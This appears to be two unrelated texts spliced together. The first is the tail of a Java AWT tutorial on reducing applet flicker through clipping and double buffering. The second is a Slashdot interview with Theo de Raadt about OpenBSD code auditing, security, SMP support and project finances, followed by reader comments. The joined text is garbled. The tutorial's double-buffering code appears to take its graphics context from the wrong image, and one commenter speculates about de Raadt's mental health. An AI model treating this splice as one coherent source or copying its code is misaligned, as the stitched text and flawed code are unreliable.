grid; y++ ) for ( int x = 0; x <= grid; x++ ) { g.setColor( (black = !black) ? Color.black : Color.white ); g.fillRect( x * w, y * h, w, h ); } g.drawImage( img, currentX, currentY, imgWidth, imgHeight, this ); } } Try dragging the image; you'll notice both the background and foreground flicker as they are repeatedly redrawn. What is TerribleFlicker doing, and what is it doing wrong? As the mouse is dragged, TerribleFlicker keeps track of its position in two instance variables, currentX and currentY. On each call to mouseDragged(), the coordinates are updated, and repaint() is called to ask that the display be updated. When paint() is called, it looks at some parameters, draws the checkerboard pattern to fill the applet's area, and finally paints a small version of the image at the latest coordinates. Our first, and biggest, problem is that we are updating, but we have neglected to implement the applet's update() method with a good strategy. Because we haven't overridden update(), we are getting the default implementation of the Component update() method, which looks something like this: // Default implementation of applet update public void update( Graphics g ) { setColor ( backgroundColor ); fillRect( 0, 0, getSize().width, getSize().height ); paint ( g ); } This method simply clears the display to the background color and calls our paint() method. This is almost never the best strategy, but is the only appropriate default for update(), which doesn't know how much of the screen we're really going to paint. Our applet paints its own background, in its entirety, so we can provide a simpler version of update() that doesn't bother to clear the display: // add to TerribleFlicker public void update( Graphics g ) { paint( g ); } This applet works better because we have eliminated one large, unnecessary, and (in fact) annoying graphics operation. However, although we have eliminated a fillRect() call, we're still doing a lot of wasted drawing. Most of the background stays the same each time it's drawn. You might think of trying to make paint() smarter, so that it wouldn't redraw these areas, but remember that paint() has to be able to draw the entire scene because it might be called in situations when the display isn't intact. The solution is to have update() help out by restricting the area paint() can draw. The setClip() method of the Graphics class restricts the drawing area of a graphics context to a smaller region. A graphics context normally has an effective clipping region that limits drawing to the entire display area of the component. We can specify a smaller clipping region with setClip(). How is the drawing area restricted? Well, foremost, drawing operations that fall outside of the clipping region are not displayed. If a drawing operation overlaps the clipping region, we see only the part that's inside. A second effect is that, in a good implementation, the graphics context can recognize drawing operations that fall completely outside the clipping region and ignore them altogether. Eliminating unnecessary operations can save time if we're doing something complex, like filling a bunch of polygons. This doesn't save the time our application spends calling the drawing methods, but the overhead of calling these kinds of drawing methods is usually negligible compared to the time it takes to execute them. (If we were generating an image pixel by pixel, this would not be the case, as the calculations would be the major time sink, not the drawing.) So we can save time in our applet by having our update method set a clipping region that results in only the affected portion of the display being redrawn. We can pick the smallest rectangular area that includes both the old image position and the new image position, as shown in Figure 13.7. This is the only portion of the display that really needs to change; everything else stays the same. An arbitrarily smart update() could save even more time by redrawing only those regions that have changed. However, the simple clipping strategy we've implemented here can be applied to many kinds of drawing, and gives quite good performance, particularly if the area being changed is small. One important thing to note is that, in addition to looking at the new position, our updating operation now has to remember the last position at which the image was drawn. Let's fix our applet so it will use a clipping region. To keep this short and emphasize the changes, we'll take some liberties with design and make our next example a subclass of TerribleFlicker. Let's call it ClippedFlicker: public class ClippedFlicker extends TerribleFlicker { int nextX, nextY; public void mouseDragged( MouseEvent e ) { nextX = e.getX(); nextY = e.getY(); repaint(); } void clipToAffectedArea( Graphics g, int oldx, int oldy, int newx, int newy, int width, int height) { int x = Math.min( oldx, newx ); int y = Math.min( oldy, newy ); int w = ( Math.max( oldx, newx ) + width ) - x; int h = ( Math.max( oldy, newy ) + height ) - y; g.setClip( x, y, w, h ); } public void update( Graphics g ) { int lastX = currentX, lastY = currentY; currentX = nextX; currentY = nextY; clipToAffectedArea( g, lastX, lastY, currentX, currentY, imgWidth, imgHeight ); paint( g ); } } You should find that ClippedFlicker is significantly faster, though it still flickers. We'll make one more change in the next section to eliminate that. So, what have we changed? First, we've overridden mouseDragged() so that instead of setting the current coordinates of the image, it sets another pair of coordinates called nextX and nextY. These are the coordinates at which we'll display the image the next time we draw it. update() now has the added responsibility of taking the next position and making it the current position, by setting the currentX and currentY variables. This effectively decouples mouseDragged() from our painting routines. We'll discuss why this is advantageous in a bit. update() then uses the current and next coordinates to set a clipping region on the Graphics object before handing it off to paint(). We have created a new, private method to help it do this. clipToAffectedArea() takes as arguments the new and old coordinates and the width and height of the image. It determines the bounding rectangle as shown in Figure 13.6, then calls setClip() to set the clipping region. As a result, when paint() is called, it draws only the affected area of the screen. So, what's the deal with nextX and nextY? By making update() keep track of the next, current, and last coordinates separately, we accomplish two things. First, we always have an accurate view of where the last image was drawn and second, we have decoupled where the next image will be drawn from mouseDragged(). It's important to decouple painting from mouseDragged() because there isn't necessarily a one-to-one correspondence between calls to repaint() and subsequent calls by AWT to our update() method. This isn't a defect; it's a feature that allows AWT to schedule and consolidate painting requests. Our concern is that our paint() method may be called at arbitrary times while the mouse coordinates are changing. This is not necessarily bad. If we are trying to position our object, we probably don't want the display to be redrawn for every intermediate position of the mouse. It would slow down the dragging unnecessarily. If we were concerned about getting every single change in the mouse's position, we would have two options. We could either do some work in the mouseDragged() method itself, or put our events into some kind of queue. We'll see an example of the first solution in our DoodlePad example a bit later. The latter solution would mean circumventing AWT's own event-scheduling capabilities and replacing them with our own, and we don't want to take on that responsibility. Now let's get to the most powerful technique in our toolbox: double buffering. Double buffering is a technique that fixes our flickering problems completely. It's easy to do and gives us almost flawless updates. We'll combine it with our clipping technique for better performance, but in general you can use double buffering with or without clipping. Double buffering our display means drawing into an off-screen buffer and then copying our completed work to the display in a single painting operation, as shown in Figure 13.8. It takes the same amount of time to draw a frame, but double buffering instantaneously updates our display when it's ready. We can get this effect by changing just a few lines of our ClippedFlicker applet. Modify update() to look like the following and add the new offScreenImage instance variable as shown: ... public class DoubleBufferedClipped extends ClippedFlicker { Image offScreenImage; Graphics offScreenGC; public void update( Graphics g ) { if ( offScreenImage == null ) { offScreenImage = createImage( getSize().width, getSize().height ); offScreenGC = img.getGraphics(); } int lastX = currentX, lastY = currentY; currentX = nextX; currentY = nextY; clipToAffectedArea( offScreenGC, lastX, lastY, currentX, currentY, imgWidth, imgHeight ); clipToAffectedArea( g, lastX, lastY, currentX, currentY, imgWidth, imgHeight ); paint( offScreenGC ); g.drawImage(offScreenImage, 0, 0, this); } } ... Now, when you drag the image, you shouldn't see any flickering. The update rate should be about the same as in the previous example (or marginally slower), but the image should move from position to position without noticeable repainting. So, what have we done this time? Well, the new instance variable, offScreenImage, is our off-screen buffer. It is a drawable Image object. We can get an off-screen Image for a component with the createImage() method. createImage() is similar to getImage(), except that it produces an empty image area of the specified size. We can then use the off-screen image like our standard display area by asking it for a graphics context with the Image getGraphics() method. After we've drawn into the off-screen image, we can copy that image back onto the screen with drawImage(). The biggest change to the code is that we now pass paint() the graphics context of our off-screen buffer, rather than that of the on-screen display. paint() is now drawing on offScreenImage; it's our job to copy the image to the display when it's done. This might seem a little suspicious to you, as we are now using paint() in two capacities. AWT calls paint() whenever it's necessary to repaint our entire applet and passes it an on-screen graphics context. When we update ourselves, however, we call paint() to do its work on our off-screen area and then copy that image onto the screen from within update(). Note that we're still clipping. In fact, we're clipping both the on-screen and off-screen buffers. Off-screen clipping has the same benefits we described earlier: AWT should be able to ignore wasted drawing operations. On-screen clipping minimizes the area of the image that gets drawn back to the display. If your display is fast, you might not even notice the savings, but it's an easy optimization, so we'll take advantage of it. We create the off-screen buffer in update() because it's a convenient and safe place to do so. Also, note that our image observer probably won't be called, since drawImage() isn't doing anything nasty like scaling, and the image itself is always available. The dispose() method of the Graphics class allows us to deallocate a graphics context explicitly when we are through with it. This is simply an optimization. If we were creating new graphics contexts frequently (say, in each paint()), we could give the system help in getting rid of them. This might provide some performance improvement when doing heavy drawing. We could allow garbage collection to reclaim the unused objects; however, the garbage collection process might be hampered if we are doing intense calculations or lots of repainting. In addition to serving as buffers for double buffering, off-screen images are useful for saving complex, hard-to-produce, background information. We'll look at a simple example: the "doodle pad." DoodlePad is a simple drawing tool that lets us scribble by dragging the mouse, as shown in Figure 13.9. It draws into an off-screen image; its paint() method simply copies the image to the display area. import java.awt.*; import java.awt.event.*; public class DoodlePad extends java.applet.Applet implements ActionListener { DrawPad dp; public void init() { setLayout( new BorderLayout() ); add( "Center", dp = new DrawPad() ); Panel p = new Panel(); Button clearButton = new Button("Clear"); clearButton.addActionListener( this ); p.add( clearButton ); add( "South", p ); } public void actionPerformed( ActionEvent e ) { dp.clear(); } } class DrawPad extends Canvas { Image drawImg; Graphics drawGr; int xpos, ypos, oxpos, oypos; DrawPad() { setBackground( Color.white ); enableEvents( AWTEvent.MOUSE_EVENT_MASK | AWTEvent.MOUSE_MOTION_EVENT_MASK ); } public void processEvent( AWTEvent e ) { int x = ((MouseEvent)e).getX(), y = ((MouseEvent)e).getY(); if ( e.getID() == MouseEvent.MOUSE_DRAGGED ) { xpos = x; ypos = y; if ( drawGr != null ) drawGr.drawLine( oxpos, oypos, oxpos=xpos, oypos=ypos ); repaint(); } else if ( e.getID() == MouseEvent.MOUSE_PRESSED ) { oxpos = x; oypos = y; } super.processEvent(e); } public void update( Graphics g ) { paint(g); } public void paint( Graphics g ) { if ( drawImg == null ) { drawImg = createImage( getSize().width, getSize().height ); drawGr = drawImg.getGraphics(); } g.drawImage(drawImg, 0, 0, null); } public void clear() { drawGr.clearRect(0, 0, getSize().width, getSize().height); repaint(); } } Give it a try. Draw a nice moose, or a sunset. I just drew a lovely cartoon of Bill Gates. If you make a mistake, hit the Clear button and start over. The parts should be familiar by now. We have made a type of Canvas called DrawPad. The new DrawPad component handles mouse events by enabling both simple mouse events (mouse clicks) and mouse motion events (mouse drags), and then overriding the processEvent() method to handle these events. By doing so, we are simulating the old (Java 1.0) event handling model; in this situation, it's a little more convenient than implementing all the methods of the MouseListener and MouseMotionListener interfaces. The processEvent() method handles MOUSE_DRAGGED movement events by drawing lines into an off-screen image and calling repaint() to update the display. DrawPad's paint() method simply does a drawImage() to copy the off-screen drawing area to the display. In this way, DrawPad saves our sketch information. What is unusual about DrawPad is that it does some drawing outside of paint() or update(). In our clipping example, we talked about decoupling update() and mouseDragged(); we were willing to discard some mouse movements in order to save some updates. In this case, we want to let the user scribble with the mouse, so we should respond to every mouse movement. Therefore, we do our work in processEvent() itself. As a rule, we should be careful about doing heavy work in event handling methods because we don't want to interfere with other tasks the AWT thread is performing. In this case, our line drawing operation should not be a burden, and our primary concern is getting as close a coupling as possible between the mouse movement events and the sketch on the screen. In addition to drawing a line as the user drags the mouse, the part of processEvent() that handles MOUSE_DRAGGED() events maintains a set of old coordinates, to be used as a starting point for the next line segment. The part of processEvent() that handles MOUSE_PRESSED events resets the old coordinates to the current mouse position whenever the user picks up and moves to a new location. Finally, DrawPad provides a clear() method that clears the off-screen buffer and calls repaint() to update the display. The DoodlePad applet ties the clear() method to an appropriately labeled button through its actionPerformed() method. What if we wanted to do something with the image after the user has finished scribbling on it? Well, as we'll see in the next section, we could get the pixel data for the image from its ImageProducer object and work with that. It wouldn't be hard to create a save facility that stores the pixel data and reproduces it later. Think about how you might go about creating a networked "bathroom wall" where people could scribble on your Web pages.
https://docstore.mik.ua/orelly/java/exp/ch13_05.htm
CC-MAIN-2019-18
refinedweb
3,070
63.19
Theo de Raadt Responds 261 A book on code auditing? by LizardKing Would!!! Theo:. A solid systems's approach should not be based on "but it works". Yet, time and time again, we see that for most people this is the case. They don't care about good software, only about "good enough" software. So the programmers can continue to make such mistakes. Thus, I do not feel all that excited about writing a book which would simply teach people that the devil is in the details. If they haven't figured it out by now, perhaps they should consider another occupation (one where they will cause less damage). Making the rest secure by squiggleslash OpenBSD has a well deserved reputation for security "out of the box" and for the fact the inbuilt tools are as secure as they're ever likely to be. However, the Ports system is, perhaps, an example of where the secure approach currently has limitations - an installation of OpenBSD running popular third-party systems like INN can only be so secure because the auditing of INN, and other such software, is outside the scope of the BSD audit. My question is, has the OpenBSD team ever proposed looking into how to create a 'secured ports' tree, or some other similar system, that would ensure that many of the applications people specifically want secure platforms like OpenBSD to run could be as trusted as the platforms themselves? Theo: We have our hands already pretty full, just researching new ideas in our main source tree, which is roughly 300MB in size. We also lightly involved ourselves in working with the XFree86 people a while back for some components there. Auditing the components outside of this becomes rather unwieldly. The difficulty lies not only in the volume of such code, but also in other issues. Sometimes communication with the maintainers of these other packages is difficult, for various reasons. Sometimes they are immediately turned off because we don't use the word Linux. Some of these portable software packages are by their nature never really going to approach the quality of regular system software, because they are so bulky. But most importantly, please remember that we are also human beings, trying to live our lives in a pleasant way, and don't ussually get all that excited about suddenly burning 800 hours in some disgusting piece of badly programmer trash which we can just avoid running. I suppose that quite often some of our auditors look at a piece of code and go "oh, wow, this is really bad", and then just avoid using it. I know that doesn't make you guys feel better, but what can we say... OpenBSD, security, et al. by jd With the release of SGI's B1 code, and the attempts by many U*ixen to secure their contents via capabilities, ACL's, etc, ad nausium, how is OpenBSD approaching the issue of resource control? On a side note, is OpenBSD likely to ever head in the direction of being a distributed kernel? And, if so, how would security and resource management be maintained? (It's hard enough on a central kernel system.) Theo: On the first question, I think there is great confusion in the land of Orange Book. Many people think that is about security. It is not. Largely, those standards are about accountability in the face of threat. Which really isn't about making systems secure. It's about knowing when your system's security breaks down. Not quite the same thing. Please count the commercially deployed C, B, or even A systems which are actually being used by real people for real work, before foaming at the mouth about it all being "so great". On the other hand, I think we wil see if some parts of that picture actually start to show up in real systems, over time. By the way, I am surprised to see you list ACLs, which don't really have anything to do with B1 systems. As to the second issue, I have no idea what a distributed kernel is, nor do I see how anything like that would improve security or quality of a system. Forks and cooperation by PapaZit A lot of people know that OpenBSD forked from NetBSD, and there's still some animosity between the two groups. Personally, I think that the competition has helped both groups (NetBSD now ships with far fewer open services, for example). Egos are delicate things, but do you see any chance for greater cooperation in the future, or do you see more forking and division as inevitable? Theo: Considering that NetBSD has maintained a black-hole route to the OpenBSD project networks for roughly four years, I don't see how any cooperation at higher levels are possible. However, there are developers who work on multiple projects. Some of them used to complain about having troubles from various groups. Nowadays, I think they've got it easier. Politics do not dictate developer relationships these days.? Do you want everyone to vote for the same political party, too? Kernel design by laertes I have only been using OpenBSD for a short while now, so forgive me if this question is based upon some incorrect assumtions. OpenBSD's kernel design seems to be of the monolithic species. OpenVMS (no relation) and NT are two prominent operating systems that use a microkernel archetecture. The microkernel design seems to me to be fundamentally more secure, since there is less priveledged code. Further, if one of the servers is compromised, the damage is minimezed. My question is this: Is the OpenBSD design fundamentally secure, or is it only a very well done implementation of a basically flawed design? Theo: I don't think it makes any difference, whatsoever. I think your computer science teachers are still teaching you from books written in the 80's, when the word "micro-kernel" was associated with a future utopia. We do not think that NT is a microkernel, and are you really so sure that OpenVMS is? A microkernel is not a kernel that does things through loadable modules. As well, I don't think it makes any difference, as long as a system does what it is supposed to do. Where Did You Learn Your Code Audit Discipline? by EXTomar Did the drive to audit code come from the need or the design of BSD? Or was it initially a whim? More imporantly, where did you learn it from? Is their some "mentor" you looked too for ridge design? I have to admire your team's daunting code reviewing...I wonder if I'll ever have that kind of meticulous coding nature. Theo: The auditing process developed out of a desire to improve the quality of our operating system. Once we started on it, it becames fascinating, fun, and very nearly fanatical. About ten people worked together on it, basically teaching ourselves as things went along. We searched for basic source-code programmer mistakes and sloppiness, rather than "holes" or "bugs". We just kept recursing through the source tree everytime we found a sloppiness. Everytime we found a mistake a programmer made (such as using mktemp(3) in such a way that a filesystem race occured), we would go throughout the source tree and fix ALL of them. Then when we fix that one, we would find some other basic mistake, and then fix ALL of them. Yes, it's a lot of work. But it has a serious payback. Can you imagine if a Boeing engineer didn't fix ALL of the occurances of a wiring flaw? Why not at least try to engineer software in the same way? Firewall/NAT box by yamla Linux has FreeSco, a product that fits on a 3.5 inch floppy disk and acts as a router and NAT (Network Address Translation). I always thought something like this would be ideal for OpenBSD. After all, I would rather trust OpenBSD than Linux for this. Are there any plans to produce something like this? Something with a very simple user interface that is quick and easy to get set up? I'd love to play with OpenBSD and do it by hand but I simply do not have the time. Theo: I must say that I am not a fan of these floppy-based routers. Essentially, you are taking one of the most unreliable pieces of storage known to man, and trying to build security infrastructure on it. That's madness. Just buy a small disk. Perhaps somethings based on a CD plus some other (non-floppy) persistant storage might be sane. But please. Not floppies. Are you mad? Code-auditing by AT Any advise for code auditers? Can you share any tips or techniques you have found useful in uncovering bugs? What do you first look for in a fresh piece of code? What about a mature piece of code? Theo: I suppose the biggest tip would be to become a better programmer. In particular, study what functions that programs are calling, and ensure that the calling code is following the rules of those functions 100%. How many of you understand the complete & correct semantics of every function in libc, or even just the libc functions being called by the program you are looking? (I mean, we went through our entire source tree, and about half the strncat() and strncpy() calls were subtly wrong, even if it only meant they copied a character extra and then zero'd it out -- it is still sloppy). manual pages where functions were mis-described, and when we found those, lots of programmers had followed the instructions incorrectly... Dual Processor Support by dragonfly_blue Although there has been some indication that people are interested in running OpenBSD on machines with dual or quad processors, it appears that there are not enough resources and volunteers available to make this a reality. Although I use OpenBSD for my web server, I am by no means an expert, at this, but I'm curious nonetheless. From what I've heard, multiprocessing support is going to be a very tricky thing to implement, because it gives rise to so many possible exploits, particularly with regards to race conditions. I also understand that it would take a remarkable amount of effort and time to rewrite much of the code base for SMP without compromising the OS's integrity. With that in mind, what kind of resources would you need before you could seriously consider attempting dual or quad processor support? And, if you were given unlimited access to those resources, how long would it take before a -stable release would be ready? I would really like to see this feature get implemented, although I know that at this point your developer team is busy enough as it is. Theo: At this time, we are not working on SMP. It's a lot of work, and not considered the most interesting thing to our developers. Sorry. Time warp by rho Thanks for your work, Theo. I use OBSD every day as a workstation and as a firewall, and the Cop-chasing-script-kiddie t-shirt is the best. If you could time warp back to the beginning of OpenBSD's development (ignoring the scism that brought you to that point), what would you do differently? Would you have chosen a more commercial focus? Pushed SMP development earlier? Run around in circles waving your hands in the air? On another note, what's your feeling about commercial use of OpenBSD? i.e., do you support it, tolerate it, or what? (better example, I make a set-top box running OpenBSD, and I need the OS to do "X". If I called you and said, "Theo, I need OpenBSD to support 'X'", would I be told to piss up a rope, write it myself, or would the OpenBSD team do it for a price?) Theo: The licence on our code is pretty clear. We want vendors to use our code. We want commercial operating systems to ship with OpenSSH. Not shipping with an SSH varient causes great grief, and it is time that ends. Same goes for OpenBSD. We would prefer if companies building commercial network appliances used OpenBSD, rather than writing their own operating systems. Typically, these companies are very comfortable with solving the problems within their application space. Yet, there is a history of these companies writing their own cruddy operating systems, and at the same time writing worse applications. It would be better if routers, firewalls, telephone switches, fileservers, and whatever else used reliable components, designed by people who care. So go ahead, use any parts of OpenBSD as parts of commercial systems. Full Disclosure And Version Numbering by Effugas First of all, I want to thank you for the hard work you've done building OpenBSD. It truly is a wonderful package. Much of the security in OpenBSD lies under the hood in the work you've done cleansing the source of unsafe library calls. While this work is appreciated, I've become more and more concerned lately about the fact that these changes are not necessarily documented and certainly not reflected in the version number of an application or utility. Version numbers reflect a snapshot in the life of a codebase. They're used to reference unsafe editions or particularly stable builds. Major number reflect code branches, but minor numbers reflect specific states of the code -- such is the expectation of a user or an administrator when a version number is detected. Without granularity of versioning, I have no reason to trust or distrust a given application by its number; I must personally audit its source -- and end up giving it a number of my own. You and your team are code auditing masters. Rather than pollute the namespace by making indistinguishable your securely built modified code and the original(and, by extension, your secure code and numerous unnamed distributions' "just get it to compile" modifications), wouldn't it be appropriate for OpenBSD to apply a name extension to any package which it has modified, and in the interests of full disclosure, to provide a reasonable CHANGELOG of the fixes contained therein? Theo: Two numbers exist for every component of OpenBSD. One number is the release that the piece came in, ie. 2.8. The other number exists in each source file that was built. And that number is also in each binary that was built from those files. You can use the what(1) command to determine the revisions of source files which make up each binary. As to the "original" you talk about, there is no original. OpenBSD uses it's own components. I don't know what packages you are talking about. cat is cat. ftpd is ftpd. tar is tar. It's the one that came with a certain release. In the systems approach, the version numbering that other groups do is sometimes invalid, because pieces (such as libraries) are all part of the picture. Was the last plane you were on using front wheel version 2.7 or 2.9? You don't care. You do however care greatly that a "systems approach" was used to ensure that it was whole. And in the OpenBSD case, that means pick a version, and install the patches. Asking for more means that you want us to do less work on the system, and more version numbering. Where does the money go? by MrSparkler I've seen reports of estimated CD sales per release at being as high as 10000. Add in t-shirt/poster sales and donations and a relatively considerable sum of money is flowing around OpenBSD. Combine this with the fact that checks are to be written to Mr. de Raadt and I get curious as to how the finances are handled. Not that I'm suggesting any misappropriation is occurring, I would just like to know who is in charge of the money and whether or not the OpenBSD project is registered as a non-profit organization (and if it is then checks should be made out to - and the CD image should be copyrighted to - that organization). Also, I would like to see a small financial report put out (as would be required if it were a non-profit organization in Alberta) so that users can see where their money is going. Plus, I would also like know exactly how many CDs are sold per release. I greatly appreciate the work that the OpenBSD project developers have put in, and I plan on continuing to use, purchase, and donate to OpenBSD (and maybe even contribute when I get the technical skills) regardless of the answer to this question: Where exactly does the money go? Theo: We've not yet sold 10,000 CDs in a release. Hopefully we will soon. The project ends up with a bit less than 50% of the revenues from CD sales. The tshirt business is doing OK, but you make a lot less selling textiles. With posters we operate just above break-even. Even though some are sold on the web, most turn out to be free handouts at most conferences. That is how I planned the posters to operate. We have thought about becoming a non-profit organization, but it is not really a good idea. It would not provide any real benefit -- to you -- as the masses. Especially in Canada, there are costs and serious responsibilities associated with doing such a thing. We would be giving up a lot of freedom, and would need to hire someone to do a lot of accounting. Also, since many of our donations come from outside Canada, we still could not really generate taxable benefits to you. (And I must ask, why are people so cheap, that they only give donations when it provides a partial reduction in their taxes, rather than a real donation? I actually find that pretty fake.) Money from the project goes to various things. First off, it ensures that I can work full time on OpenBSD, and not need another job. I am also hoping to do the same for other developers in the project, who have indicated that they are interested in doing so. Secondly, certain grimey, unenjoyable, and very important development tasks sometimes put a bit of money in developer pockets. Some OpenSSH work was funded by matching OpenBSD money against donations from a Van Dyke. Thirdly, the project buys a fair amount of hardware: In powerpc land alone, 4 machines this year. Fourth, shipping costs to conferences sometimes severely cut into profits from sales. And finally, when developers get together to do hacking, project money sometimes pays for various things, like airplane tickets, accomodation, and sometimes even some beer. And beer results in ideas, which results in new code. -------------- Before you ask: yes, we'll be doing Slashdot interviews with people from other *BSD projects in the near future - Robin Re:But he doesnt follow his own advice (Score:1) Re:But he doesnt follow his own advice (Score:2) In the end, I felt an interview would not *help* the OpenBSD community really, because someone would find fault in *something* and draw it out, enhance it, to really no good point at all. Well, it seems that CyberKNet's post is a nice example of that. It's classic You think his answers were belittling? Look at your questions, for crying out loud: LizardKing's Q on a code auditing book--Answered on the OBSD newsgroup already. Search deja. Making Ports Secure--Gee, let's ask a question to the person resonsible for OS security about ALL program security that might run on the OS. iow, if there was an interview with Linus, it would be like asking him why perl on some Linux distributions had a security hole because the developers were stupid enough to hard code B1 and OpenBSD Q--Asked and answered when Trusted BSD came out. Search deja and misc. Working with other BSD distributions--Communication is a two way road. Look, this is a silly question to ask, not because of the question, but because the answer is so readily apparant. The comments by the NetBSD and FreeBSD groups as well as users is plain to see on the newsgroups, on web pages, etc. It's all *very* public. SMP and dual-processor support--Search the mailing lists. Asked and answered. Version numbering--Already addressed when there were comments about the lack of a stable branch in OBSD. $ issues--Lovely. As if that wasn't an insulting question. The "I don't want to teach you" mentality is really the "No, I don't want to feed you with a spoon." No one, including the moderators, checked to see if these questions were asked and answered by simply grepping an email archive. No Linux user in the community is going to point out that, "Hey, last year or so, there was a posting on a Debian mailing list about developers getting sick of answering lame questins too." As to the BSD and Linux community differences, well, they are different communities. I moved away from Linux because the communities just got bogged down *for my tastes*. My take is that the Linux community is *incredibly* ignorant of the BSD community, not vice versa. filtering by FreeBSD/NetBSD (Score:3) > a black-hole route to the OpenBSD > project networks for roughly four years, Those who do not familiar with Mr. Theo de Raadt's usual action about BSDs should know the following history about the mail filtering. This issue is once raised by a OpenBSD developer in DaemonNews forum [daemonnews.org] which has neutral position between FreeBSD, NetBSD and OpenBSD, and its conclusion is that the forum should never have posted the topic [daemonnews.org]. I don't know why Mr. de Raadt mentioned this filtering again in slashdot. Perhaps He'd like to show that he is still ready to post mail bomb to FreeBSD/NetBSD mailing list? Re:Theo: Version Number Specifics (Score:3) Re:Theo and Microkernels (Score:2) Secondly, pay attention to what Theo is saying: most security problems come from incorrect use of interfaces. In the microkernel world, you may indeed have fewer interfaces to the kernel, but understanding how to use those interfaces can be an extremely daunting tasks (just ask anyone who's hacked on Mach before). Furthermore, you still need interfaces to all the userland code that's running on top of the kernel (i.e., if you need to interface with the filesystem, it doesn't matter whether it's in the kernel or not, you can still get the interface wrong and thereby create a security problem). In HURD, for example, the interfaces and interdependancies between modules are MORE complex, particularly given that you have to allow for an infinite number of implementations of said interfaces. Re:Working with microkernels (Score:2) Econ 102... (Score:3) The big "merit" in the "donation" thing is if this allows the organization to receive individual contributions from individuals that wouldn't otherwise be able to "deduct" the payment for tax purposes. While, when you add this sort of thing up across thousands of churches, it adds up to real money, it's not going to be spectacularly worthwhile for a software project that might get $30K in donations and have to spend a chunk of that on organizational costs. A reply to his reply to my questions. :) (Score:3) However, some form of resource control is essential to preventing users authorised for one thing from doing something else. ACL's are -one- way of doing this, the schemes described in B1 are another. You're again 100% right that they're not the same thing. However, they both attempt to deliniate exactly what a user is and is not able to do. (As for foaming at the mouth, I'm going to go out on a limb here and guess you've met some pseudo-nerds who're drunk on a mix of power & Agent Orange, and who believe that if it's "Official", it's somehow "better" or mysteriously "all-encompasing". I'm not about to start a cult to the Mighty OB1. :) Distributed Kernels are kernels which divide low-level tasks between sub-kernels, where each sub-kernel runs on a seperate processor or even a seperate machine. Distributed Kernels are one way of doing hardware-independent parallel processing. You're not tied to SMP, you're not tied to a single motherboard, you're not even tied to a specific manufacturer. From a security standpoint, it has two major impacts. On the one hand, breaking one component of the system does NOT necessarily compromise any other component. They run on seperate CPUs, after all. This means that you can have secure intrusion detection at the kernel level, with secure fail-over to a non-compromised system in the event of intrusion. On the other, you're now ferrying very low-level data across a network of unknown security. The risk of someone compromising the system by compromising the network is obviously much higher than for a stand-alone kernel. Last, but not least, to anyone who may be critical of him, Theo de Raadt is perhaps the most brilliant guy in the BSD world and I'd place him as one of the top 3 coders in the world. As for his infamous "moods" - if he's bipolar, HFA or AS, then his moods (and his brilliance) are entirely explicable and nothing to condemn him for. Re:No plans for SMP... (Score:2) Exactly, Choice is good. The important fact is that all of these OSes are a mere hop, skip, and a jump from each other. All of them also have their technical advantages as well. And yes, that includes Linux. The beautty is that once compatibility is out of the picture you are free to choose your OS for purely technical reasons. Re:No plans for SMP... (Score:5) SMP is plenty interesting to the Linux crowd. They have spent a huge amount of time working on it. The fact that it isn't interesting to Theo and the folks working on OpenBSD simply highlights one of the benefits to the Open Source way of getting things done. If you start your project on OpenBSD and decide that you need SMP to get the performance you need "porting" to Linux shouldn't be much harder than moving your source to a Linux box and typing "make." If, on the other hand, you develop on Linux and then decide that Linux's security isn't good enough for implementation, you can just as easily port to OpenBSD. There is never going to be an Uber OS that is specialized for every task (although the generic Unix way of recompiling the kernel does come close). That's why standardized APIs are so important. That way you can change your OS midstream if it isn't giving you what you need. The Open Source community has done a pretty good job of matching up APIs. Re:No upstream (Score:2) OpenBSD is not "300MB of source" that Theo thought up. There's quite a bit--likely a majority--of stuff brought in from other coders *WHICH RETAIN IDENTICAL VERSION INFORMATION*. Go query Perl. Or vi. Or httpd. They're all external packages, with their own internal version. If Theo wanted to reversion them to "Perl OBSD 2.8" and "Apache OBSD 2.8" and so on, that's fine. But that Perl ain't 5.6.0 unless it was built from the 5.6.0 tree. --Dan Re:No upstream (Score:2) Now, why would I put the question to the number one distribution known for doing it right, when everybody else does it to? To redefine that which is known as "doing it right", so we don't get any more Debian Secret Backported Bugfixes. :-) --Dan Re:Theo: Version Number Specifics (Score:2) Yes, I can definitely hunt down the changes, and Theo is well within his rights to change the source. Hell, I'm thrilled he's fixing problems. But should I have to check a changelog to know there's a change? That's the bottom line question. Should not a version reflect a snapshot of code? Should not I be able to trust a given codebase by its version alone, rather than have to audit the source by hand? If a version *doesn't* refer to a snapshot of code...well, what does it refer to? --Dan Re:Security... (Score:2) Because I wanted command completion. What, you think sh is the height of security? Among other things, *any* shell can be trojan'd to attack replace su, or even You are correct, of course. Most things shouldn't be done as root. I could theoretically have checked versions without it. This is somewhat on the order of a spelling flame, but I'll take it in stride. As for my qualifications, feel free to scan my BugTraq posts, and thank you for helping to prevent my ego from growing too large. Yours Truly, Dan Kaminsky DoxPara Research Re:No upstream (Score:2) Still, I question if the version number should stay stable. Suppose, for a moment, that the rest of the world finally discovers major holes in 5.6.0. Should OpenBSD administrators have to root around the Changelogs to realize they're running a safe build? Wouldn't it be better for them to be running 5.6.0_OB2.7 and see that, heh, the Changelog shows that the new stuff protects them? === $ perl -v This is perl, v5.6.0 built for sparc-openbsd Page. $ perl -V Summary of my perl5 (revision 5.0 version 6 subversion 0) configuration: Platform: osname=openbsd, osvers=2.7, archname=sparc-openbsd uname='openbsd' config_args='-Dopenbsd_distribution=defined -dsE'='cc', optimize='-O2', gccversion=2.95.2 19991024 (release) cppflags='-fno-strict-aliasing -I/usr/local/include' ccflags ='-fno-strict-aliasing -I/usr/local/include' stdchar='char', d_stdstdio=undef, usevfork=true intsize=4, longsize=4, ptrsize=4, doublesize=8 d_longlong=define, longlongsize=8, d_longdbl=define, longdblsize=8 ivtype='long', ivsize=4, nvtype='double', nvsize=8, Off_t='off_t', lseeksize=8 alignbytes=8, usemymalloc=n, prototype=define Linker and Libraries: ld='ld', ldflags ='' libpth=/usr/lib libs=-lm -lc libc=/usr/lib/libc.a, so=so, useshrplib=true, libperl=libperl.so.6.0 Dynamic Linking: dlsrc=dl_dlopen.xs, dlext=so, d_dlsymun=define, ccdlflags=' ' cccdlflags='-DPIC -fPIC ', lddlflags='-Bshareable ' Characteristics of this binary (from libperl): Compile-time options: USE_LARGE_FILES Built under openbsd Compiled at May 5 2000 12:35:29 @INC: . === Re:No upstream (Score:2) YES! It IS! It's too hard for me to read the source code to every app I run. I admit it. I want to trust Theo. I want to believe his prying eyes are protecting me from danger. I don't *want* to have to go diving into the code he writes or even the fixes he claims when a new vulnerability comes out. I want to know: Is this the exact same code that is vulnerable everywhere else? Then upgrade. Is this NOT the 